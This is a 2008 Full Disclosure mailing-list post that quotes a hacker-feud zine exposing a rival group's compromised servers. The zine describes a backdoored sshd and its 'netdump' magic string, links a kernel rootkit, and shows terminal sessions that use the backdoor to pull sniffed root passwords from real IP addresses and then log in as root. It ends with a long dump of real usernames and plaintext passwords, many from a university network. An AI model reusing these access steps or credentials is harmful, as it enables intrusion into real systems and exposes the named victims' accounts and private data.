Full Disclosure mailing list archives
Re: x0x0x? its a joke!
From: Thedjatclubrock <tdjacr.wiki () gmail com>
Date: Sun, 31 Aug 2008 16:29:56 -0400
Robert Holgstad wrote:
you got owned by lamers, why do we care what you think or say? also you complain that all they can do is use modified sshd versions and that this makes them lame, but during your 'zine' this is all you are doing. does this also make you 'lamer'? On Sat, Aug 30, 2008 at 1:40 PM, bussinessinbox box <bussinessinbox () gmail com <mailto:bussinessinbox () gmail com>> wrote: SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt #!/labsec/v/for/vendetta:book1-x0x0x
######################################################################################################################
# #
# .____ ___.
_________ #
# | | _____ \_ |__ / _____/ ____
____ #
# | | \__ \ | __ \ \_____ \_/ __ \_/
___\ #
# | |___ / __ \| \_\ \/ \ ___/\
\___ #
# |_______ (____ /___ /_______ /\___ >\___
#
# \/ \/ \/ \/ \/
\/ #
# .___ .___ __
.__ #
# | | ____ __| _/_ __ _______/
|________|__| ____ ______ #
# | |/ \ / __ | | \/ ___/\ __\_ __
\ |/ __ \ / ___/ #
# | | | \/ /_/ | | /\___ \ | | | |
\/ \ ___/ \___ \ #
# |___|___| /\____ |____//____ > |__| |__|
|__|\___ >____ > #
# \/ \/
\/ \/ \/ #
# #
# #
# -
presents: #
# \- x0x0x exposed
-/ #
# #
######################################################################################################################
# #
# #
# chapter one : random lame stuff #
# chapter two : owned by yourself #
# chapter three : download files/sniffs/stuff #
# chapter four : conclusion #
# - x0x0x - #
# #
# #
# - [V]endetta. #
# #
#################################################################
- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is:
vendetta >:)
- <l> we've got ourselfs owned around sep~2007 by the most lamer
guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !
#################################################################
# #
# #
# _ _ #
# __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ #
# / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) #
# \__|_||_\__,_| .__/\__\___|_| \___/_||_\___|
#
# |_| #
# #
# #
#################################################################
first of all, lets introduce x0x0x, the most pseudo-hackers of
efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))
[1];
http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt have you noticed how lame they are ? all they can & will ever do is change your openssh version to a
cracked one
and pray that the users will log into some kool server
and guess what, its NOT EVEN MADE by them ! - lets check it out -
central@labsec [~xoxox/openssh-4.7p1] # more skynet.h
/*
### # ### ## ### ## ### ###
###### ######
## # ## # ## ## ## #
## # # ## #
#### ### #### ### #
#### ##
### #### ## #####
## ##
# ## ## ## ## ## ## ##
## ##
#### #### ## #### ### ##
###### ####
- V E R S I O N 1. 0 -
coded by fmrj
11.01.2008
Features:
- Logs SSH, SCP, SFTP, SSHD and ip / hostname
- ftp logger included (netkit-ftp)
- Encrypted sniffer logs
- SSH, SCP, SFTP will not log you
- compile script (see compile.sh)
- rootlogin is permitted even though remoterootlogin is set to no
- Will not log to syslog, utmp, wtmp or lastlog
- If MAGIC_VERSION is NOT undeclared:
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs
without you having to log in.
(WARNING: telnet does NOT encrypt like SSH, so this would be
visible with tcpdump)
Also this will NOT get logged by syslog
Future features:
- pid hiding
- More encryption / better sniffer encryption (thought of rc-crypt)
- strace will show that ssh is logging, make it so that if ssh is
being ptrace'd it will not log
- Have a cool PS1 for the bd
- Write a ssh client that can:
-> Connect and dump logs so you dont have to use telnet
approach (encrypted)
-> That can do connect-chain (ssh -bounce box1 box2 box3)
If you have this, it either means we are friends or someone gave
it to you, if so
I would like this bd to be kept as private as possible, so please
dont pass it on
I would also appreciate suggestions / ideas / help / whatever for
future features
aim: fmrj09
- Thanks *
*/
- then there is some shit aion code which is public @ packetstorm -
- their kool sshd backdoor kan be found in the end of thiz zine -
- dont forget to check the gr8 shellscript skotch made -
################################## leTz hIghTlIghT 50m3th1n6
#############################
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs
without you having to log in.
################################## LETS HIGHLIGHT SOMETHING
#############################
ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !
*thinks* is that a deja-vu or something ? i could swear that x0x0x
wrote something about it in our zine ! *thinks*
central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION "netdump"
----- th4nk5 8uddY ------
----- end of lame sshd backdor ----
***************** phalanx the gr8 kernel rootkit ***************
7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?
PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at
http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2
* attached their k00l phalanx in the bottom of the zine *
***************** phalanx the gr8 kernel rootkit ***************
------ funny stuff:
while looking at their boxes, we felt so disappointed that they
cant even write the right sshd version..
[139.82.95.11:22 <http://139.82.95.11:22>] : SSH-2.0-p2-FC-4.3
[212.200.96.150:22 <http://212.200.96.150:22>] :
SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[216.75.56.186:22 <http://216.75.56.186:22>] : SSH-2.0-OenSSH_4.2
[140.122.141.164:2174 <http://140.122.141.164:2174>]: SSH-2.0-p1
Debian-5ubuntu0.5
[143.107.250.214:22 <http://143.107.250.214:22>] : SSH-1.99-p1 [201.62.131.185:22 <http://201.62.131.185:22>] : SSH-2.0-p1
Debian-8ubuntu1.2
[200.144.189.17:22 <http://200.144.189.17:22>] : SSH-1.99-p1
you must be asking yourself.. wtf? they cant even copy&paste the
right sshd version, how do they own so many servers?
answer: bad system admins. doing a easy md5 checksum on ssh/sshd
binaries would do the trick. they dont even check their sshd banners.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel
rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ?
they blame us about using the same password, what about thei
magic_password ? kool, they use the 'netdump' on all their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
#################################################################
# #
# __ __ __ #
# ____/ / ___ ____ / /____ ____ / /__ _____ #
# / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ #
# \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ #
# /_/ #
# #
# #
#################################################################
; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
;
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE
usEd to BE
central@labsec [~xoxox/h3h3] # telnet 189.3.219.4
<http://189.3.219.4> 22
Trying 189.3.219.4...
Connected to 189.3.219.4 <http://189.3.219.4> (189.3.219.4
<http://189.3.219.4>).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd
- cut-
******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3
5n1ff3r, 455h0l3 ********************
central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4
<mailto:root@189.3.219.4>
root@189.3.219.4 <mailto:root@189.3.219.4>'s password:
Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222
<http://189.4.161.222>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux servnet 2.6.18-4-486 i686 ****
root@servnet:~#
root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686
GNU/Linux
inet addr:189.3.219.4 <http://189.3.219.4>
Bcast:189.3.219.63 <http://189.3.219.63> Mask:255.255.255.192 <http://255.255.255.192>
root@servnet:~# last -1 root
root pts/2 189.4.161.222 <http://189.4.161.222> Fri
Aug 8 16:27 - 16:32 (00:04)
222.161.4.189.in-addr.arpa domain name pointer
bd04a1de.virtua.com.br <http://bd04a1de.virtua.com.br>.
******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z
********************
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 91.199.207.141
<http://91.199.207.141> 22
Trying 91.199.207.141...
Connected to 91.199.207.141 <http://91.199.207.141>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
pass_from: 91.199.207.142 <http://91.199.207.142> user:
root pass: salinarsalinar (x2.sprintdns.net <http://x2.sprintdns.net>) -->>>>>>>>>> i hope you guys change the passwd real quick :)
central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
<mailto:root@91.199.207.141>
root@91.199.207.141 <mailto:root@91.199.207.141>'s password: Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz
<http://97.139.broadband2.iol.cz>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux x1 2.6.18-6-686 i686 ****
root@x1:~#
root@x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686
GNU/Linux
08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38
(00:20)
root@x1:~# ifconfig -a|grep inet
inet addr:91.199.207.141 <http://91.199.207.141>
Bcast:91.199.207.255 <http://91.199.207.255> Mask:255.255.255.0 <http://255.255.255.0>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 195.91.248.58
<http://195.91.248.58> 22
Trying 195.91.248.58...
Connected to 195.91.248.58 <http://195.91.248.58>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.
central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
<mailto:root@195.91.248.58>
root@195.91.248.58 <mailto:root@195.91.248.58>'s password: Last login: Mon Aug 11 13:00:20 2008 from
ppp85-140-31-214.pppoe.mtu-net.ru <http://ppp85-140-31-214.pppoe.mtu-net.ru>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux localhost 2.6.24-gentoo-r3 i686 ****
localhost ~ #
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local
time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux
10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07
(00:06)
wtmp begins Mon Mar 31 21:49:08 2008
inet addr:195.91.248.58 <http://195.91.248.58>
Bcast:195.91.248.63 <http://195.91.248.63> Mask:255.255.255.240 <http://255.255.255.240>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 195.71.126.86
<http://195.71.126.86> 22
Trying 195.71.126.86...
Connected to 195.71.126.86 <http://195.71.126.86>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.2
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from: 91.128.212.13 <http://91.128.212.13> user:
root pass: w22662s (d91-128-212-13.cust.tele2.at <http://d91-128-212-13.cust.tele2.at>) ---->>>> no localhost this time(yay!) but it works.
central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
<mailto:root@195.71.126.86>
root@195.71.126.86 <mailto:root@195.71.126.86>'s password: root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686
GNU/Linux
08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc
root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash
root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc
inet Adresse:195.71.126.86 <http://195.71.126.86>
Bcast:195.71.126.95 <http://195.71.126.95> Maske:255.255.255.240 <http://255.255.255.240>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 152.66.208.100
<http://152.66.208.100> 22
Trying 152.66.208.100...
Connected to 152.66.208.100 <http://152.66.208.100>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: joeb pass:
xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
pass_from: 78.131.80.171 <http://78.131.80.171> user:
joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>) > better be changing that by now.
SSH2_OUT: 78.131.80.171 <http://78.131.80.171> user:
joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>)> better be changing that by now.
SSH2_OUT: 84.2.126.154 <http://84.2.126.154> user: joeb
pass: valami (dsl54027E9A.pool.t-online.hu <http://dsl54027E9A.pool.t-online.hu>) > better be changing that by now.
central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
<mailto:root@152.66.208.100>
root@152.66.208.100 <mailto:root@152.66.208.100>'s password: Last login: Wed Aug 13 08:29:00 2008 from
78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux maszat 2.6.18-6-686-bigmem i686 ****
root@maszat:~#
root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008
i686 GNU/Linux
08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:152.66.208.100 <http://152.66.208.100>
Bcast:152.66.208.127 <http://152.66.208.127> Mask:255.255.255.128 <http://255.255.255.128>
inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64
Scope:Global
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 147.46.242.9
<http://147.46.242.9> 22
Trying 147.46.242.9...
Connected to 147.46.242.9 <http://147.46.242.9>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
pass_from: 147.46.242.52 <http://147.46.242.52> user:
dreameye pass: ii1945 (ropas.snu.ac.kr <http://ropas.snu.ac.kr>) ------>>>>>>>>>>>>>> sorry koreans, nothing personal.
pass_from: 211.48.102.167 <http://211.48.102.167> user:
dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean, personal with you, you no.
central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
<mailto:root@147.46.242.9>
root@147.46.242.9 <mailto:root@147.46.242.9>'s password: Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr
<http://ropas.snu.ac.kr>
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux abs 2.6.24-19-server i686 ****
root@abs:~#
root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686
GNU/Linux
15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:147.46.242.9 <http://147.46.242.9>
Bcast:147.46.242.255 <http://147.46.242.255> Mask:255.255.255.0 <http://255.255.255.0>
inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
inet6 addr: ::1/128 Scope:Host
dreameye pts/0 ropas.snu.ac.kr <http://ropas.snu.ac.kr> Thu
Aug 7 03:35 - 03:36 (00:00)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 200.160.119.92
<http://200.160.119.92> 8022 ----- same applies for 200.160.119.93 <http://200.160.119.93> (another dumbox on the network)
Trying 200.160.119.92...
Connected to 200.160.119.92 <http://200.160.119.92>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user?
pass_from: 192.168.100.231 <http://192.168.100.231> user:
root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y
central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92
<mailto:root@200.160.119.92> -p 8022
root@200.160.119.92 <mailto:root@200.160.119.92>'s password:
******* no skynet thiz timE *********** h3h3h3h3 ***********
Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
root@eumisrvgw2:~#
root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008
i686 GNU/Linux
03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:192.168.100.242 <http://192.168.100.242>
Bcast:192.168.100.255 <http://192.168.100.255> Mask:255.255.255.0 <http://255.255.255.0>
inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
inet addr:192.168.200.254 <http://192.168.200.254>
Bcast:192.168.200.255 <http://192.168.200.255> Mask:255.255.255.0 <http://255.255.255.0>
inet addr:200.160.119.92 <http://200.160.119.92>
Bcast:200.160.119.95 <http://200.160.119.95> Mask:255.255.255.240 <http://255.255.255.240>
inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
inet addr:200.169.223.172 <http://200.169.223.172>
Bcast:200.169.223.175 <http://200.169.223.175> Mask:255.255.255.248 <http://255.255.255.248>
root@eumisrvgw2:~# last -10 root|grep 189\.4
root pts/0 189.4.161.222 <http://189.4.161.222> Mon
Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who that kool ip iz.
----------------------->>>>> bruteforce again? what a zhame !
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central@labsec [~xoxox/h3h3] # telnet 200.20.9.67
<http://200.20.9.67> 22
Trying 200.20.9.67...
Connected to 200.20.9.67 <http://200.20.9.67>.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
vEcTrrA (localhost)
central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67
<mailto:root@200.20.9.67> -p 8022
root@200.20.9.67 <mailto:root@200.20.9.67>'s password: root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686
GNU/Linux
04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00
root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep
OUT ------------>> this is their default sniffer path.
SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass:
LiNuX0527 (didi.if.uff.int <http://didi.if.uff.int>)
SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass:
LiNuXS0527 (didi.if.uff.int <http://didi.if.uff.int>)
SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: nuno pass:
surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>)
SSH2_OUT: 10.0.0.106 <http://10.0.0.106> user: lourenco pass:
LiNuX0527 (cerbero4.if.uff.int <http://cerbero4.if.uff.int>)
SSH2_OUT: 10.0.0.108 <http://10.0.0.108> user: critter pass:
559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>)
SSH2_OUT: 10.0.0.136 <http://10.0.0.136> user: davidvaz pass:
2o3145 (barabasi.if.uff.int <http://barabasi.if.uff.int>)
SSH2_OUT: 10.0.0.145 <http://10.0.0.145> user: lubian pass:
15862jLr (lip-serverI.if.uff.int <http://lip-serverI.if.uff.int>)
SSH2_OUT: 10.0.0.147 <http://10.0.0.147> user: mcosta pass:
950205 (nano3.if.uff.int <http://nano3.if.uff.int>)
SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: asa pass:
gabixande2 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>)
SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: mcosta pass:
950205 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>)
SSH2_OUT: 10.0.0.156 <http://10.0.0.156> user: thiagofts
pass: 8vacagk (Owner-PC.if.uff.int <http://Owner-PC.if.uff.int>)
SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: alanfr pass:
ck37=2x (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: curso pass:
curso (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: help pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: opeador pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: operador pass:
slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>)
SSH2_OUT: 10.0.0.179 <http://10.0.0.179> user: orahcio pass:
wulto12 (viagra.if.uff.int <http://viagra.if.uff.int>)
SSH2_OUT: 10.0.0.188 <http://10.0.0.188> user: nuno pass:
surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>)
SSH2_OUT: 10.0.0.195 <http://10.0.0.195> user: asa pass:
gabixande2 (nano2.if.uff.int <http://nano2.if.uff.int>)
SSH2_OUT: 10.0.0.196 <http://10.0.0.196> user: isidoro pass:
VU4R9C (zico.if.uff.int <http://zico.if.uff.int>)
SSH2_OUT: 10.0.0.2 <http://10.0.0.2> user: isidoro pass: VU4R9C
SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass:
2o3145 (homer.if.uff.int <http://homer.if.uff.int>)
SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass:
o3145 (homer.if.uff.int <http://homer.if.uff.int>)
SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: tgmattos pass:
CAMtgm&7 (homer.if.uff.int <http://homer.if.uff.int>)
SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: asa pass:
gabixande2 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass:
LiNuX0527 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass:
LiNuX05427 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: dionizio pass:
Zoedoulos (cerbero9.if.uff.int <http://cerbero9.if.uff.int>)
SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: lourenco pass:
LiNuX0527 (cerbero9.if.uff.int <http://cerbero9.if.uff.int>)
SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass:
LiNuX0527 (romario.if.uff.int <http://romario.if.uff.int>)
SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass:
LiNuX527 (romario.if.uff.int <http://romario.if.uff.int>)
SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: dionizio pass:
Zoedoulos (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass:
LiNuX0527 (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass:
exit (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: jssm pass:
Jujaja (complex000.if.uff.int <http://complex000.if.uff.int>)
SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: nuno pass:
surfar (complex000.if.uff.int <http://complex000.if.uff.int>)
SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: pmco pass:
druida99 (complex000.if.uff.int <http://complex000.if.uff.int>)
SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: alan pass:
ck37=2x
SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass:
slacksucks!
SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass:
slacksucks! (urania.if.uff.int <http://urania.if.uff.int>)
SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass:
(damasco.if.uff.int <http://damasco.if.uff.int>)
SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass:
truthno1 (damasco.if.uff.int <http://damasco.if.uff.int>)
SSH2_OUT: 10.0.0.247 <http://10.0.0.247> user: jssm pass:
Jujaja (gould.if.uff.int <http://gould.if.uff.int>)
SSH2_OUT: 10.0.0.44 <http://10.0.0.44> user: tgmattos pass:
CAMtgm&7
SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira
pass: Instituto
